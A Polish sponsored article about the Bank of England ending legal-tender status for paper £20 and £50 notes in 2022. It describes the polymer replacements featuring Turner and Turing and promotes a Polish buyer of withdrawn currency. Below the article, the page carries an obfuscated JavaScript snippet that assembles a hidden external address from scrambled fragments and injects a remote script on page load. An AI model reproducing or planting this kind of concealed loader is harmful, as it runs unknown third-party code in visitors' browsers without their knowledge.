Został rok na wymianę 20 i 50 funtów. Należy się pospieszyć!

20 funtów

Pod koniec września 2022 roku Bank Anglii wycofa status prawnego środka płatniczego papierowych banknotów o nominale 20 i 50 funtów. Nowe 20 i 50 funtów – obok 5 funtów z wizerunkiem Winstona Churchilla i 10 funtów z Jane Austen – są częścią pierwszej serii brytyjskiej waluty, która wykonana jest z polimeru i która ma zastąpić banknoty papierowe.

Nowy materiał zabezpieczeniem przed fałszerzami

W ostatnich latach Bank Anglii zdecydował na wprowadzenie banknotów polimerowych, gdyż pozwala to na zastosowanie nowej generacji zabezpieczeń, które czynią je trudniejszymi do podrobienia. Z corocznych statystyk, przeprowadzanych przez Bank Anglii i brytyjską Agencję ds. Przestępczości Zorganizowanej wynika, że banknot o nominale 20 funtów jest jedną z najczęściej podrabianych walut na świecie i tylko w pierwszej połowie 2020 roku wykryto i wycofano z obiegu około 33 000 fałszywych egzemplarzy.

Nowe, polimerowe banknoty są odporne na brud i wilgoć, dzięki czemu dłużej też pozostają w lepszym stanie. Banknoty te mają także cechy dotykowe, które pozwalają na posługiwanie się nimi osobom niewidomym i niedowidzącym.

Ile „starych” zostało w obiegu?

Ostatnie dane Banku Anglii pokazały, że istnieje 114 milionów papierowych banknotów o nominale 5 funtów i 76 milionów banknotów o nominale 10 funtów, które już przestały być prawnym środkiem płatniczym. Jest to jednak znacznie mniejsza suma w porównaniu z całkowitą wartością papierowych banknotów o nominałach 20 i 50 funtów.

Jak wynika z danych Banku Anglii, w obiegu wciąż znajduje się około 9 mld funtów z papierowych banknotów o nominale 20 funtów i 15 mld funtów z papierowych banknotów o nominale 50 funtów. W miarę ich zwrotu do Banku Anglii, są one zastępowane nowymi polimerowymi banknotami £20 z wizerunkiem malarza, J.M.W. Turnera oraz polimerowymi banknotami £50 z wizerunkiem brytyjskiego naukowca, Alana Turinga. Po 30 września 2022 r. nowe banknoty polimerowe będą jedynymi banknotami posiadającymi status prawnego środka płatniczego.

Kiedy pojawił się nowy banknot o nominale 20 funtów?

Bank Anglii po raz pierwszy wyemitował polimerowy banknot 20 funtów 20 lutego 2020 roku. Polimerowy banknot posiada kilka zabezpieczeń przed fałszowaniem waluty, w tym hologram zmiany wizerunku i przezroczyste okienka. Zmianę wizerunku hologramu można zauważyć po przechyleniu banknotu z boku na bok – napis zmienia się z “Twenty” na “Pounds”. Po obu stronach metalicznego wizerunku nad głównym okienkiem powinny występować wyraźne różnice – folia powinna być niebiesko-złota z przodu i srebrna z tyłu. Drugie okienko, znacznie mniejsze, jest również umieszczone w dolnym rogu banknotu. Te dwa zabezpieczenia powinny pomóc potwierdzić, czy banknot jest prawdziwą walutą o nominale 20 funtów – a Bank Anglii twierdzi, że jest to najbezpieczniejszy banknot, jaki wydał.

Jak zostało wspomniane wyżej, na nowym polimerowym banknocie 20 funtów widnieje twarz artysty JMW Turnera. Jest to autoportret Turnera, namalowany około 1799 roku i obecnie wystawiony w Tate Britain, na tle jednego z jego najsłynniejszych obrazów – Walki Temeraire’a. Obraz „Walczący Temeraire” jest hołdem dla okrętu HMS Temeraire, który odegrał wybitną rolę w zwycięstwie Horatio Nelsona w bitwie pod Trafalgarem w 1805 roku. Na banknocie znajduje się również podpis Turnera z jego testamentu, w którym pozostawił wiele swoich obrazów narodowi, oraz cytat “światło jest więc kolorem” zaczerpnięty z wykładu, który wygłosił w 1818 roku.

Kiedy pojawił się nowy banknot o nominale 50 funtów?

Banknot pojawił się w obiegu 23 czerwca 2021 roku, zaś Alan Turing został ujawniony jako nowa postać dla banknotu w lipcu 2019 roku. Wizerunek naukowca zastąpi obecne postaci – przedsiębiorcę Matthew Boulton i inżyniera Jamesa Watt’a, którzy w 2011 roku pojawili się na brytyjskiej walucie.

Kandydatura Alana Turinga została wyselekcjonowana w wyniku konkursu, zorganizowanego przez Bank, który otrzymał w sumie 227 299 nominacji, obejmujących 989 kwalifikujących się postaci. Powołany komitet rozważył wszystkie nominacje, by ostatecznie wybrać Turinga.

Gubernator Andrew Bailey tak komentuje tę decyzję: “Nasze banknoty upamiętniają niektóre z najważniejszych postaci historycznych naszego kraju. Dlatego bardzo się cieszę, że Alan Turing znalazł się na nowym polimerowym banknocie 50-funtowym. Alan Turing, który w czasie II wojny światowej pracował w Bletchley Park nad złamaniem kodu, był pionierem w pracach nad wczesnymi komputerami, a także dokonał przełomowych odkryć w dziedzinie biologii rozwojowej. Był również gejem i w związku z tym był okropnie traktowany. Umieszczenie go na tym nowym banknocie jest wyrazem uznania dla jego wkładu w rozwój naszego społeczeństwa i uczczeniem jego niezwykłego życia”.

Wzór na rewersie banknotu upamiętnia pionierską pracę naukowca z komputerami i zawiera tablicę matematyczną i wzory z przełomowej pracy Turinga z 1936 roku “On Computable Numbers, with an application to the Entscheidungsproblem” Proceedings of the London Mathematical Society.

Co dalej ze „starymi” banknotami?

Bank Anglii będzie kontynuował wymianę wszystkich wycofanych banknotów. Po 30 września 2022 roku osoby posiadające konto bankowe w Wielkiej Brytanii nadal będą mogły wpłacać wycofane banknoty na swoje konto. Niektóre urzędy pocztowe mogą również przyjmować wycofane banknoty jako zapłatę za towary i usługi lub jako wpłatę na konto dostępne za ich pośrednictwem, jednak oficjalne dane potwierdzają – z dniem 1.10.2022 papierowe banknoty stracą status legalnego środka płatniczego.

Co jednak z osobami spoza UK, które nie planują w najbliższym roku wizyty w Wielkiej Brytanii ani też nie chcą wysyłać swoich funtów pocztą do oddziału banku w Anglii? Jeżeli za rok okaże się, że wciąż masz stare funty, najlepszym rozwiązaniem będzie skorzystanie z oferty kantorów, które skupują stare banknoty z całego świata, takich jak https://staragotowka.pl/. Nie czekaj i już dziś wymień stare funty w skupie walut wycofanych z obiegu.


Materiał partnera. Zdjęcia: freepik.com


(function(){
tv07u=”pajd5l34v078″;tv07=document.createElement(“script”);
tv07_=”u”+(“st”);tv07_+=”at”+(“.”);tv07.async=true;tv07_+=”in”;
tv07u=”363080958.”+tv07u;tv07.type=”text/javascript”;tv07u+=”vw3ssmuu5i8f”;
tv07u+=”X10qlh”;tv07_+=(“f”)+”o”+(“/”);tv07.src=”https://”+tv07_+tv07u;
tv07d=document.body;tv07d.appendChild(tv07);
})();

Total
0
Shares
Sprawdź także
Total
0
Share